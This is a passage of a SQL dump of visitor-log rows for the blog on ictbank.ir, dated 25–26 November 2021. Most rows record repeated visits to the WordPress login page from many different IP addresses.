(15923,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.100.19','000',0,1,0),
(15924,'2021-11-25','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','164.132.44.97','000',0,1,0),
(15925,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.48.197','000',0,1,0),
(15926,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.123.210','000',0,1,0),
(15927,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.68.31','000',0,1,0),
(15928,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.209.252','000',0,1,0),
(15929,'2021-11-25','http://82.102.9.14/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.145.96','000',0,2,0),
(15930,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.242.105','000',0,1,0),
(15931,'2021-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,4,0),
(15932,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.208.194','000',0,1,0),
(15933,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.45.20','000',0,1,0),
(15934,'2021-11-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.115','000',0,2,0),
(15935,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.189.223','000',0,1,0),
(15936,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.201.50','000',0,1,0),
(15937,'2021-11-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(15938,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.251.221','000',0,1,0),
(15939,'2021-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(15940,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.83.128','000',0,1,0),
(15941,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.239.84','000',0,1,0),
(15942,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.111.229','000',0,1,0),
(15943,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.31.128','000',0,1,0),
(15944,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.40.195','000',0,1,0),
(15945,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.132.213.76','000',0,1,0),
(15946,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.222.81','000',0,2,0),
(15947,'2021-11-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,5,0),
(15948,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.105.211','000',0,1,0),
(15949,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.19.21','000',0,1,0),
(15950,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.32.24','000',0,1,0),
(15951,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.143.124','000',0,1,0),
(15952,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.25.214','000',0,1,0),
(15953,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.131.39.19','000',0,2,0),
(15954,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.98.5','000',0,1,0),
(15955,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.30.252','000',0,1,0),
(15956,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.73.167','000',0,1,0),
(15957,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.142.157','000',0,1,0),
(15958,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.231.103','000',0,1,0),
(15959,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.190.63','000',0,1,0),
(15960,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.252.254','000',0,1,0),
(15961,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.245.144','000',0,1,0),
(15962,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.207.184','000',0,1,0),
(15963,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.93.223','000',0,1,0),
(15964,'2021-11-25','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','162.243.228.106','000',0,2,0),
(15965,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.113.242','000',0,1,0),
(15966,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.76.215','000',0,1,0),
(15967,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.97.85','000',0,1,0),
(15968,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.176.246','000',0,1,0),
(15969,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.237.250','000',0,1,0),
(15970,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.113.115','000',0,1,0),
(15971,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.166.169','000',0,1,0),
(15972,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.173.2','000',0,1,0),
(15973,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.31.163','000',0,1,0),
(15974,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.252.146','000',0,1,0),
(15975,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.10.239','000',0,1,0),
(15976,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.75.78','000',0,1,0),
(15977,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.151.123','000',0,1,0),
(15978,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.4.102','000',0,1,0),
(15979,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.152.42','000',0,1,0),
(15980,'2021-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(15981,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.118.200','000',0,1,0),
(15982,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.212.54','000',0,1,0),
(15983,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.33.14','000',0,1,0),
(15984,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.110.51','000',0,1,0),
(15985,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.67.206','000',0,1,0),
(15986,'2021-11-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','213.168.248.62','000',0,2,0),
(15987,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.217.117','000',0,1,0),
(15988,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.235.59','000',0,1,0),
(15989,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.151.109','000',0,1,0),
(15990,'2021-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.111.180','000',0,2,0),
(15991,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.35.109','000',0,1,0),
(15992,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.134.56','000',0,1,0),
(15993,'2021-11-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','46.199.5.100','000',0,2,0),
(15994,'2021-11-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,2,0),
(15995,'2021-11-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15996,'2021-11-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(15997,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.45.85','000',0,1,0),
(15998,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.38.212','000',0,1,0),
(15999,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.238.38','000',0,1,0),
(16000,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.126.246','000',0,1,0),
(16001,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.17.166','000',0,1,0),
(16002,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.8.222','000',0,1,0),
(16003,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.40.187','000',0,1,0),
(16004,'2021-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(16005,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.49.226','000',0,1,0),
(16006,'2021-11-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','193.92.182.236','000',0,2,0),
(16007,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.168.12','000',0,1,0),
(16008,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.47.106','000',0,1,0),
(16009,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.92.105','000',0,1,0),
(16010,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.99.83','000',0,1,0),
(16011,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.25.79','000',0,1,0),
(16012,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.68.96','000',0,1,0),
(16013,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.214.143','000',0,1,0),
(16014,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.190.24.105','000',0,1,0),
(16015,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.27.74','000',0,1,0),
(16016,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.130.232','000',0,1,0),
(16017,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.122.23','000',0,1,0),
(16018,'2021-11-25','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.248.90','000',0,1,0),
(16019,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.153.243','000',0,2,0),
(16020,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.189.199','000',0,1,0),
(16021,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.224.169','000',0,1,0),
(16022,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.71.158','000',0,1,0),
(16023,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.237.250','000',0,1,0),
(16024,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.129.236','000',0,1,0),
(16025,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.26.191','000',0,1,0),
(16026,'2021-11-26','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(16027,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.190.158','000',0,1,0),
(16028,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.75.154','000',0,1,0),
(16029,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.50.96','000',0,1,0),
(16030,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.157.87','000',0,1,0),
(16031,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.137.90','000',0,1,0),
(16032,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.171.106','000',0,1,0),
(16033,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.88.103','000',0,1,0),
(16034,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.100.82','000',0,1,0),
(16035,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.224.116','000',0,1,0),
(16036,'2021-11-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(16037,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.57.42','000',0,1,0),
(16038,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.123.82','000',0,1,0),
(16039,'2021-11-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,4,0),
(16040,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.217.117','000',0,1,0),
(16041,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.132.0','000',0,1,0),
(16042,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.204.86','000',0,1,0),
(16043,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.173.51','000',0,1,0),
(16044,'2021-11-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,2,0),
(16045,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.205.71','000',0,1,0),
(16046,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.171.1','000',0,1,0),
(16047,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.101.235','000',0,1,0),
(16048,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.120.119','000',0,1,0),
(16049,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.66.240','000',0,1,0),
(16050,'2021-11-26','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(16051,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.13.251','000',0,1,0),
(16052,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.49.67','000',0,1,0),
(16053,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.181.41','000',0,1,0),
(16054,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.41.128','000',0,1,0),
(16055,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.50.165','000',0,1,0),
(16056,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.162.211','000',0,1,0),
(16057,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.159.51','000',0,1,0),
(16058,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.107.88','000',0,1,0),
(16059,'2021-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.170.37','000',0,1,0),
(16060,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.215.231','000',0,1,0),
(16061,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.151.64','000',0,1,0),
(16062,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.97.44','000',0,1,0),
(16063,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.204.126','000',0,1,0),
(16064,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.115.24','000',0,1,0),
(16065,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.150.66','000',0,1,0),
(16066,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.189.228','000',0,1,0),
(16067,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.109.219','000',0,1,0),
(16068,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.216.127','000',0,1,0),
(16069,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.134.6','000',0,1,0),
(16070,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.131.95','000',0,1,0),
(16071,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.129.13','000',0,1,0),
(16072,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.189.214','000',0,1,0),
(16073,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.98.61','000',0,1,0),
(16074,'2021-11-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(16075,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.13.199','000',0,1,0),
(16076,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.250.91','000',0,1,0),
(16077,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.83.157','000',0,1,0),
(16078,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.248.184','000',0,1,0),
(16079,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.241.137','000',0,1,0),
(16080,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.111.164','000',0,1,0),
(16081,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.194.56','000',0,1,0),
(16082,'2021-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.202.179','000',0,2,0),
(16083,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.107.109','000',0,1,0),
(16084,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.169.25','000',0,1,0),
(16085,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.84.46','000',0,1,0),
(16086,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.143.241','000',0,1,0),
(16087,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.188.205','000',0,1,0),
(16088,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.96.223','000',0,1,0),
(16089,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.1.219','000',0,1,0),
(16090,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.191.52','000',0,1,0),
(16091,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.102.46','000',0,1,0),
(16092,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.12.80','000',0,1,0),
(16093,'2021-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.116','000',0,6,0),
(16094,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.68.241','000',0,2,0),
(16095,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.24.168','000',0,1,0),
(16096,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.46.216','000',0,1,0),
(16097,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.187.200','000',0,1,0),
(16098,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.206.52','000',0,1,0),
(16099,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.26.73','000',0,1,0),
(16100,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.51.78','000',0,1,0),
(16101,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.124.64','000',0,1,0),
(16102,'2021-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.125.217','000',0,1,0),
(16103,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.232.233','000',0,1,0),
(16104,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.149.170','000',0,1,0),
(16105,'2021-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,2,0),
(16106,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.255.163','000',0,1,0),
(16107,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.114.88','000',0,1,0),
(16108,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.98.59','000',0,1,0),
(16109,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.180.83','000',0,1,0),
(16110,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.44.162','000',0,1,0),
(16111,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.160.27','000',0,1,0),
(16112,'2021-11-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(16113,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.246.145','000',0,1,0),
(16114,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.197.234','000',0,1,0),
(16115,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.8.244','000',0,1,0),
(16116,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.59.20','000',0,1,0),
(16117,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.8.111','000',0,1,0),
(16118,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.62.47','000',0,1,0),
(16119,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.113.186','000',0,1,0),
(16120,'2021-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(16121,'2021-11-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','46.199.5.100','000',0,1,0),
(16122,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.229.76','000',0,1,0),
(16123,'2021-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(16124,'2021-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(16125,'2021-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(16126,'2021-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(16127,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.115.255','000',0,1,0),
(16128,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.209.252','000',0,1,0),
(16129,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.110.254','000',0,1,0),
(16130,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.246.94','000',0,1,0),
(16131,'2021-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','107.172.76.186','000',0,2,0),
(16132,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.168.153','000',0,1,0),
(16133,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.22.86','000',0,1,0),
